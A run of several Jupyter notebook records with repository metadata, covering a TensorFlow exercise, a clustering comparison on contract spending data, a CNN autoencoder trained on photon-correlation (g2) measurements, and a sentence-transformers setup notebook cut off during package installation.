"Initialized\nMinibatch loss at step 0 : 16.8091\nMinibatch accuracy: 12.5%\nValidation accuracy: 14.0%\nMinibatch loss at step 500 : 1.75256\nMinibatch accuracy: 77.3%\nValidation accuracy: 75.0%\nMinibatch loss at step 1000 : 1.32283\nMinibatch accuracy: 77.3%\nValidation accuracy: 76.6%\nMinibatch loss at step 1500 : 0.944533\nMinibatch accuracy: 83.6%\nValidation accuracy: 76.5%\nMinibatch loss at step 2000 : 1.03795\nMinibatch accuracy: 78.9%\nValidation accuracy: 77.8%\nMinibatch loss at step 2500 : 1.10219\nMinibatch accuracy: 80.5%\nValidation accuracy: 78.0%\nMinibatch loss at step 3000 : 0.758874\nMinibatch accuracy: 82.8%\nValidation accuracy: 78.8%\nTest accuracy: 86.1%\n"
]
],
[
[
"---\nProblem\n-------\n\nTurn the logistic regression example with SGD into a 1-hidden layer neural network with rectified linear units [nn.relu()](https://www.tensorflow.org/versions/r0.7/api_docs/python/nn.html#relu) and 1024 hidden nodes. This model should improve your validation / test accuracy.\n\n---",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb04641ac66a27ea96aebeff0e074dcdac54522a | 270,390 | ipynb | Jupyter Notebook | ML/Clustering comparison Summarized Data.ipynb | georgetown-analytics/acquisitioners | acc7d4b3da71b6e08af67b1cf5f1731ea11a09c4 | [
"MIT"
] | null | null | null | ML/Clustering comparison Summarized Data.ipynb | georgetown-analytics/acquisitioners | acc7d4b3da71b6e08af67b1cf5f1731ea11a09c4 | [
"MIT"
] | null | null | null | ML/Clustering comparison Summarized Data.ipynb | georgetown-analytics/acquisitioners | acc7d4b3da71b6e08af67b1cf5f1731ea11a09c4 | [
"MIT"
] | null | null | null | 202.843211 | 37,256 | 0.893084 | [
[
[
"\n# CLUSTERING Comparisons\n \nClustering is a type of **Unsupervised Machine Learning**, which can determine relationships of unlabeled data. \n\nDBSCAN stands for Density-Based Spatial Clustering of Applications with Noise.\n\nThis notebook will show one approach to prepare data for exploration of DBScan, Agglomerative and KMeans. \nBased on [How DBSCAN Clustering Works](https://www.analyticsvidhya.com/blog/2020/09/how-dbscan-clustering-works/)\n\n### Data information\nTest DBScan over features\n- DBSCAN suffers from the curse of dimensionality.\n- This data has over 60 dimensions, so a few features will be modeled, not all of them at once.\n- Want to avoid false correlation like ice cream sales and drowning deaths, but still visualize groups and noise.",
"_____no_output_____"
],
[
"### Dependencies",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport csv\nimport os \nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import normalize\nfrom sklearn.decomposition import PCA\nimport seaborn as sns",
"_____no_output_____"
]
],
[
[
"### Preparing Data\nUse pandas to prepare data for machine learning.\n",
"_____no_output_____"
]
],
[
[
"#Reading in summarized feature set\n\nfile_name = os.path.join(os.getcwd(), \"summary_out_Text2.csv\")\n\ndf = pd.read_csv(file_name,skipinitialspace=True)",
"_____no_output_____"
]
],
[
[
"Look at the structure of the data.",
"_____no_output_____"
]
],
[
[
"df.head()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"df.shape",
"_____no_output_____"
]
],
[
[
"Select columns that will be used as features for Machine Learning.",
"_____no_output_____"
]
],
[
[
"#load two features\nx = df[['dollars_obligated','MaxTxYear']]\n",
"_____no_output_____"
]
],
[
[
"Dealing with missing values can be done by removing rows with missing data....",
"_____no_output_____"
]
],
[
[
"#check number of rows\nprint (\"original number of rows: %d\" % (len(x.index)))\n\n#see the nan rows\nx[x.isna().any(axis=1)]\n\n#remove rows\nx1 = x.dropna()\nprint (\"new number of rows: %d\" % (len(x1.index)))\n",
"original number of rows: 207714\nnew number of rows: 207714\n"
],
[
"## confirm that there are no null values\nx1.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 207714 entries, 0 to 207713\nData columns (total 2 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 dollars_obligated 207714 non-null float64\n 1 MaxTxYear 207714 non-null int64 \ndtypes: float64(1), int64(1)\nmemory usage: 3.2 MB\n"
]
],
[
[
"To see variance of features: boxplot (from Seaborn) can be used with the MinMaxscaler (from scikit-learn) to visualize this.",
"_____no_output_____"
]
],
[
[
"scaler = StandardScaler()\nX_scaled = scaler.fit_transform(x1)\n\nfmX = pd.DataFrame(X_scaled)\n\nax = sns.boxplot(data=fmX)\nax",
"_____no_output_____"
],
[
"#look at the box plot of the unscaled data\nax = sns.boxplot(data=x1)",
"_____no_output_____"
],
[
"#scatter plot the first 2 columns\nplt.figure(figsize=(10,10))\nplt.scatter(fmX[0],fmX[1],s=15,color='grey')\nplt.title('Dataset',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means=KMeans(n_clusters=4,random_state=42)\nk_means.fit(fmX[[0,1]])\nfmX['KMeans_labels']=k_means.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10,10))\nplt.scatter(fmX[0],fmX[1],c=fmX['KMeans_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled Data',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"# Normalizing the data so that \n# the data approximately follows a Gaussian distribution\nX_normalized = normalize(X_scaled)\n \n# Converting the numpy array into a pandas DataFrame\ndf_X_normalized = pd.DataFrame(X_normalized)",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means_norm=KMeans(n_clusters=4,random_state=42)\nk_means_norm.fit(df_X_normalized[[0,1]])\ndf_X_normalized['KMeans_labels']=k_means_norm.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10, 10))\nplt.scatter(df_X_normalized[0],df_X_normalized[1],c=df_X_normalized['KMeans_labels']\n ,cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled and Normalized Features',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()\n",
"_____no_output_____"
],
[
"#picking a subset of data\ndf_X_normalized.describe()",
"_____no_output_____"
],
[
"df_samp = df_X_normalized.sample(frac = 0.10)",
"_____no_output_____"
],
[
"df_samp.describe()",
"_____no_output_____"
],
[
"df_samp.shape",
"_____no_output_____"
],
[
"#Look at agglomerative - selected a very small sample since memory error\n#running this took 80% of memory -any more pings my pc\nfrom sklearn.cluster import AgglomerativeClustering\nmodel = AgglomerativeClustering(n_clusters=4, affinity='euclidean')\nmodel.fit(df_samp[[0,1]])\ndf_samp['HR_labels']=model.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\nplt.figure(figsize=(10,10))\nplt.scatter(df_samp[0],df_samp[1],c=df_samp['HR_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('Hierarchical Clustering',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#finally DBScan, though both heirarchical and KMeans did pretty well\nfrom sklearn.cluster import DBSCAN\ndbscan=DBSCAN()\ndbscan.fit(df_samp[[0,1]])\ndf_samp['DBSCAN_labels']=dbscan.labels_",
"_____no_output_____"
],
[
"df_samp.shape",
"_____no_output_____"
],
[
"# Plotting resulting clusters\nplt.figure(figsize=(10,10))\nplt.scatter(df_samp[0],df_samp[1],c=df_samp['DBSCAN_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('DBSCAN Clustering',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#try with other data that has been one hot encoded\ndf_fs=df[['naics_code','level_3_cat_platform']]",
"_____no_output_____"
],
[
"#remove nulls\ndf_fs1 =df_fs.dropna()",
"_____no_output_____"
],
[
"#scale the new data and plot\nscaler = StandardScaler()\ndf_fs_scaled = scaler.fit_transform(df_fs1)\n\ndf_scaled = pd.DataFrame(df_fs_scaled)\n\nax = sns.boxplot(data=df_scaled)\nax",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means=KMeans(n_clusters=4,random_state=42)\nk_means.fit(df_scaled[[0,1]])\ndf_scaled['KMeans_labels']=k_means.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10,10))\nplt.scatter(df_scaled[0],df_scaled[1],c=df_scaled['KMeans_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled Data',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"# Normalizing the data so that \n# the data approximately follows a Gaussian distribution\ndf_norm = normalize(df_scaled)\n \n# Converting the numpy array into a pandas DataFrame\ndf_norm = pd.DataFrame(df_norm)",
"_____no_output_____"
],
[
"#start with KMeans cluster of the 2\nk_means_norm=KMeans(n_clusters=4,random_state=42)\nk_means_norm.fit(df_norm[[0,1]])\ndf_norm['KMeans_labels']=k_means_norm.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\ncolors=['purple','red','blue','green']\nplt.figure(figsize=(10, 10))\nplt.scatter(df_norm[0],df_norm[1],c=df_norm['KMeans_labels']\n ,cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('K-Means Clustering Scaled and Normalized Features',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#try dbscan on these two\ndf_samp2 = df_norm.sample(frac = 0.05)",
"_____no_output_____"
],
[
"print(df_samp2.shape, df.shape)",
"(10386, 4) (207714, 61)\n"
],
[
"df_samp2.head()",
"_____no_output_____"
],
[
"dbscan.fit(df_samp2[[0,1]])\ndf_samp2['DBSCAN_labels']=dbscan.labels_",
"_____no_output_____"
],
[
"# Plotting resulting clusters\nplt.figure(figsize=(10,10))\nplt.scatter(df_samp2[0],df_samp2[1],c=df_samp2['DBSCAN_labels'],cmap=matplotlib.colors.ListedColormap(colors),s=15)\nplt.title('DBSCAN Clustering',fontsize=20)\nplt.xlabel('Feature 1',fontsize=14)\nplt.ylabel('Feature 2',fontsize=14)\nplt.show()",
"_____no_output_____"
],
[
"#conclusion DBScan works much better on the summarized data than the unsummarized",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb04661bd5b522b13b8dd8029c0a7aed974e6f26 | 150,233 | ipynb | Jupyter Notebook | midterm.ipynb | ubsuny/g2-coral | 2de9f2190ff51714bbcd83b74cc123ee36a0536f | [
"MIT"
] | null | null | null | midterm.ipynb | ubsuny/g2-coral | 2de9f2190ff51714bbcd83b74cc123ee36a0536f | [
"MIT"
] | 26 | 2021-03-28T20:52:44.000Z | 2021-05-14T22:01:05.000Z | midterm.ipynb | ubsuny/g2-coral | 2de9f2190ff51714bbcd83b74cc123ee36a0536f | [
"MIT"
] | 1 | 2021-05-19T02:59:51.000Z | 2021-05-19T02:59:51.000Z | 355.160757 | 42,916 | 0.928378 | [
[
[
"Since g2 data from measurements are saved in .spe files so we import an external library to read such files to get data in numpy arrays.",
"_____no_output_____"
]
],
[
[
"# import libraries we need\n%pylab inline\nimport sys\nsys.path.append('./py_programs/')\nfrom tensorflow import keras\nfrom sdt_reader import sdtfile\nfrom py_programs import sdt",
"Populating the interactive namespace from numpy and matplotlib\n"
],
[
"file = sdtfile.SdtFile('./sdt_data/Antibunching_Rh110_DPC.sdt')",
"_____no_output_____"
],
[
"file.block_measure_info",
"_____no_output_____"
],
[
"# read data files\nt1, y1 = sdt.read('./sdt_data/Antibunching_Rh110_DPC.sdt')\nt2, y2 = sdt.read('./sdt_data/Antibunching_Rh110_Spc.sdt')",
"_____no_output_____"
],
[
"# cut off the first and last few zero data points\ny2 = y2[np.argwhere(y2>0)].flatten()\nt2 = t2[np.argwhere(y2>0)].flatten()",
"_____no_output_____"
]
],
[
[
"We need to manually set the dip as the zero time delay. And also normalize the g2 signal to its maximum.",
"_____no_output_____"
]
],
[
[
"# normalize g2 values and zero the time delay\nt1_norm, y1_norm = sdt.normalize(t1,y1)\nt2_norm, y2_norm = sdt.normalize(t2,y2)",
"_____no_output_____"
],
[
"# take a look at the data\nplt.figure(1)\n\nplt.title('Antibunching_Rh110_DPC')\nplt.xlabel(r'$\\tau$(ns)')\nplt.ylabel(r'$g^{(2)}$') # un-normalized\nplt.plot(t1_norm,y1_norm)\n\nplt.figure(2)\n\nplt.title('Antibunching_Rh110_Spc')\nplt.xlabel(r'$\\tau$(ns)')\nplt.ylabel(r'$g^{(2)}$')\nplt.plot(t2_norm,y2_norm)\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"# MachineLearning Part",
"_____no_output_____"
],
[
"To avoid tensorflow occupying all CPUs or GPU in a computer we need to set processing units which tensorflow has access to use.",
"_____no_output_____"
]
],
[
[
"# this is to limit the GPU and CPUs being occupied by tensorflow\nfrom implementations import tf_setCPU",
"_____no_output_____"
],
[
"# create training sequences\n#time_step = 2\ntrain = sdt.create_train(y1_norm,time_step)\n#train2x, train2y = sdt.create_train(y1,time_step\ntrain1 = train1.reshape(train1.shape[0],train1.shape[1],1)\ntrain2 = sdt.create_train(y2_norm,time_step)\ntrain2 = train2.reshape(train2.shape[0],train2.shape[1],1)",
"_____no_output_____"
]
],
[
[
"Here I create a [1D CNN](https://keras.io/api/layers/convolution_layers/convolution1d/).",
"_____no_output_____"
]
],
[
[
"# create a training model\nkernelsize = 7\nmodel = keras.Sequential()\nmodel.add(keras.layers.Input(shape=(train1.shape[1],train1.shape[2])))\nmodel.add(keras.layers.Conv1D(filters=32, kernel_size=kernelsize, padding=\"same\", strides=1, activation=\"relu\")) #,input_shape=(train1.shape[0],train1.shape[1],1)\nmodel.add(keras.layers.Dropout(rate=0.1))\nmodel.add(keras.layers.Conv1D(filters=16, kernel_size=kernelsize, padding=\"same\", strides=1, activation=\"relu\")) #,input_shape=(train1.shape[0],train1.shape[1],1)\nmodel.add(keras.layers.Conv1DTranspose(filters=16, kernel_size=kernelsize,activation=\"relu\", padding=\"same\"))\nmodel.add(keras.layers.Dropout(rate=0.1))\nmodel.add(keras.layers.Conv1DTranspose(filters=32, kernel_size=kernelsize,activation=\"relu\", padding=\"same\"))\nmodel.add(keras.layers.Conv1DTranspose(filters=1, kernel_size=kernelsize, padding=\"same\"))\nmodel.compile(optimizer=keras.optimizers.Adam(learning_rate=0.001), loss=\"mse\")\nmodel.summary()",
"Model: \"sequential_1\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv1d_2 (Conv1D) (None, 2, 32) 256 \n_________________________________________________________________\ndropout_2 (Dropout) (None, 2, 32) 0 \n_________________________________________________________________\nconv1d_3 (Conv1D) (None, 2, 16) 3600 \n_________________________________________________________________\nconv1d_transpose_3 (Conv1DTr (None, 2, 16) 1808 \n_________________________________________________________________\ndropout_3 (Dropout) (None, 2, 16) 0 \n_________________________________________________________________\nconv1d_transpose_4 (Conv1DTr (None, 2, 32) 3616 \n_________________________________________________________________\nconv1d_transpose_5 (Conv1DTr (None, 2, 1) 225 \n=================================================================\nTotal params: 9,505\nTrainable params: 9,505\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"# training ...\nhistory = model.fit(train2,train2,epochs=20,validation_split=.1)",
"Epoch 1/20\n105/105 [==============================] - 0s 2ms/step - loss: 0.5484 - val_loss: 0.0234\nEpoch 2/20\n105/105 [==============================] - 0s 746us/step - loss: 0.0258 - val_loss: 0.0166\nEpoch 3/20\n105/105 [==============================] - 0s 727us/step - loss: 0.0157 - val_loss: 0.0022\nEpoch 4/20\n105/105 [==============================] - 0s 737us/step - loss: 0.0084 - val_loss: 0.0012\nEpoch 5/20\n105/105 [==============================] - 0s 730us/step - loss: 0.0073 - val_loss: 9.9977e-04\nEpoch 6/20\n105/105 [==============================] - 0s 751us/step - loss: 0.0063 - val_loss: 0.0012\nEpoch 7/20\n105/105 [==============================] - 0s 754us/step - loss: 0.0050 - val_loss: 0.0025\nEpoch 8/20\n105/105 [==============================] - 0s 756us/step - loss: 0.0044 - val_loss: 0.0016\nEpoch 9/20\n105/105 [==============================] - 0s 733us/step - loss: 0.0040 - val_loss: 0.0027\nEpoch 10/20\n105/105 [==============================] - 0s 691us/step - loss: 0.0034 - val_loss: 0.0020\nEpoch 11/20\n105/105 [==============================] - 0s 688us/step - loss: 0.0033 - val_loss: 0.0029\nEpoch 12/20\n105/105 [==============================] - 0s 690us/step - loss: 0.0029 - val_loss: 0.0017\nEpoch 13/20\n105/105 [==============================] - 0s 677us/step - loss: 0.0029 - val_loss: 0.0041\nEpoch 14/20\n105/105 [==============================] - 0s 722us/step - loss: 0.0028 - val_loss: 0.0023\nEpoch 15/20\n105/105 [==============================] - 0s 725us/step - loss: 0.0024 - val_loss: 0.0049\nEpoch 16/20\n105/105 [==============================] - 0s 724us/step - loss: 0.0022 - val_loss: 0.0022\nEpoch 17/20\n105/105 [==============================] - 0s 690us/step - loss: 0.0021 - val_loss: 0.0022\nEpoch 18/20\n105/105 [==============================] - 0s 691us/step - loss: 0.0021 - val_loss: 0.0036\nEpoch 19/20\n105/105 [==============================] - 0s 685us/step - loss: 0.0018 - val_loss: 0.0026\nEpoch 20/20\n105/105 [==============================] - 0s 687us/step - loss: 0.0017 - val_loss: 0.0033\n"
],
[
"plt.plot(history.history[\"loss\"], label=\"Training Loss\")\nplt.plot(history.history[\"val_loss\"], label=\"Validation Loss\")\nplt.legend()\nplt.show()",
"_____no_output_____"
],
[
"# use the model to predict data\npred1 = model.predict(train1)\npred2 = model.predict(train2)",
"_____no_output_____"
],
[
"# plot prediction\nplt.figure(1)\nplt.plot(t1_norm[:-2],pred1[:,1,0],label='predict')\nplt.plot(t1_norm[:-2],train1[:,0],'.',markersize=4,label='original')\nplt.legend(loc=(0.01,0.01))\n\nplt.figure(2)\nplt.plot(t2_norm[:-2],pred2[:,0,0],label='predict')\nplt.plot(t2_norm[:-2],train2[:,0],'.',markersize=4,label='original')\nplt.legend(loc=(0.01,0.01))\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb047b4a98b89b429484ffbb51f65379b8858d96 | 46,380 | ipynb | Jupyter Notebook | QuoraSentenceSimilarity.ipynb | subham1/sentence-transformers | f4e2009a86027b19a66721811e48aa1c3b5e295e | [
"Apache-2.0"
] | null | null | null | QuoraSentenceSimilarity.ipynb | subham1/sentence-transformers | f4e2009a86027b19a66721811e48aa1c3b5e295e | [
"Apache-2.0"
] | null | null | null | QuoraSentenceSimilarity.ipynb | subham1/sentence-transformers | f4e2009a86027b19a66721811e48aa1c3b5e295e | [
"Apache-2.0"
] | null | null | null | 39.47234 | 3,523 | 0.487602 | [
[
[
"<a href=\"https://colab.research.google.com/github/subham1/sentence-transformers/blob/master/QuoraSentenceSimilarity.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!pip install sentence_transformers ",
"Collecting sentence_transformers\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/c9/91/c85ddef872d5bb39949386930c1f834ac382e145fcd30155b09d6fb65c5a/sentence-transformers-0.2.5.tar.gz (49kB)\n\u001b[K |████████████████████████████████| 51kB 2.7MB/s \n\u001b[?25hCollecting transformers==2.3.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/50/10/aeefced99c8a59d828a92cc11d213e2743212d3641c87c82d61b035a7d5c/transformers-2.3.0-py3-none-any.whl (447kB)\n\u001b[K |████████████████████████████████| 450kB 13.5MB/s \n\u001b[?25hRequirement already satisfied: tqdm in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (4.28.1)\nRequirement already satisfied: torch>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (1.4.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (1.17.5)\nRequirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (0.22.1)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (1.4.1)\nRequirement already satisfied: nltk in /usr/local/lib/python3.6/dist-packages (from sentence_transformers) (3.2.5)\nRequirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (2019.12.20)\nRequirement already satisfied: sentencepiece in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (0.1.85)\nRequirement already satisfied: sacremoses in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (0.0.38)\nRequirement already satisfied: boto3 in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (1.11.10)\nRequirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from transformers==2.3.0->sentence_transformers) (2.21.0)\nRequirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->sentence_transformers) (0.14.1)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from nltk->sentence_transformers) (1.12.0)\nRequirement already satisfied: click in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers==2.3.0->sentence_transformers) (7.0)\nRequirement already satisfied: botocore<1.15.0,>=1.14.10 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers==2.3.0->sentence_transformers) (1.14.10)\nRequirement already satisfied: s3transfer<0.4.0,>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers==2.3.0->sentence_transformers) (0.3.2)\nRequirement already satisfied: jmespath<1.0.0,>=0.7.1 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers==2.3.0->sentence_transformers) (0.9.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (2019.11.28)\nRequirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (1.24.3)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (3.0.4)\nRequirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (2.8)\nRequirement already satisfied: docutils<0.16,>=0.10 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers==2.3.0->sentence_transformers) (0.15.2)\nRequirement already satisfied: python-dateutil<3.0.0,>=2.1 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers==2.3.0->sentence_transformers) (2.6.1)\nBuilding wheels for collected packages: sentence-transformers\n Building wheel for sentence-transformers (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for sentence-transformers: filename=sentence_transformers-0.2.5-cp36-none-any.whl size=64942 sha256=06a94fba28d1743f76016f0b307c1799b0f899ee2563439b69a1dabbf6a03995\n Stored in directory: /root/.cache/pip/wheels/b4/ce/39/5bbda8ac34eb52df8c6531382ca077773fbfcbfb6386e5d66c\nSuccessfully built sentence-transformers\nInstalling collected packages: transformers, sentence-transformers\n Found existing installation: transformers 2.4.1\n Uninstalling transformers-2.4.1:\n Successfully uninstalled transformers-2.4.1\nSuccessfully installed sentence-transformers-0.2.5 transformers-2.3.0\n"
],
[
"ls",
"\u001b[0m\u001b[01;34mdocs\u001b[0m/ NOTICE.txt requirements.txt setup.py\n\u001b[01;34mexamples\u001b[0m/ QuoraSentenceSimilarity.ipynb \u001b[01;34msentence_transformers\u001b[0m/ train.csv\nLICENSE README.md setup.cfg\n"
],
[
"cd '/content/drive/My Drive/sbert/sentence-transformers'",
"/content/drive/My Drive/sbert/sentence-transformers\n"
],
[
"!pip install transformers",
"Collecting transformers\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ee/fc/bd726a15ab2c66dc09306689d04da07a3770dad724f0883f0a4bfb745087/transformers-2.4.1-py3-none-any.whl (475kB)\n\r\u001b[K |▊ | 10kB 22.1MB/s eta 0:00:01\r\u001b[K |█▍ | 20kB 4.7MB/s eta 0:00:01\r\u001b[K |██ | 30kB 6.1MB/s eta 0:00:01\r\u001b[K |██▊ | 40kB 6.0MB/s eta 0:00:01\r\u001b[K |███▍ | 51kB 5.4MB/s eta 0:00:01\r\u001b[K |████▏ | 61kB 6.0MB/s eta 0:00:01\r\u001b[K |████▉ | 71kB 6.4MB/s eta 0:00:01\r\u001b[K |█████▌ | 81kB 7.0MB/s eta 0:00:01\r\u001b[K |██████▏ | 92kB 6.9MB/s eta 0:00:01\r\u001b[K |██████▉ | 102kB 6.9MB/s eta 0:00:01\r\u001b[K |███████▋ | 112kB 6.9MB/s eta 0:00:01\r\u001b[K |████████▎ | 122kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████ | 133kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████▋ | 143kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████▎ | 153kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████ | 163kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████▊ | 174kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████▍ | 184kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████ | 194kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████▊ | 204kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████▌ | 215kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████▏ | 225kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████▉ | 235kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████▌ | 245kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████▏ | 256kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████ | 266kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████▋ | 276kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████▎ | 286kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████ | 296kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████▋ | 307kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████▍ | 317kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████ | 327kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████▊ | 337kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████▍ | 348kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████ | 358kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████▉ | 368kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████████▌ | 378kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████████▏ | 389kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████████▉ | 399kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████████▌ | 409kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████████▎ | 419kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████████████ | 430kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████████████▋ | 440kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████████████▎ | 450kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████████████ | 460kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████████████▊| 471kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 481kB 6.9MB/s \n\u001b[?25hRequirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from transformers) (2.21.0)\nCollecting sacremoses\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a6/b4/7a41d630547a4afd58143597d5a49e07bfd4c42914d8335b2a5657efc14b/sacremoses-0.0.38.tar.gz (860kB)\n\u001b[K |████████████████████████████████| 870kB 16.0MB/s \n\u001b[?25hCollecting 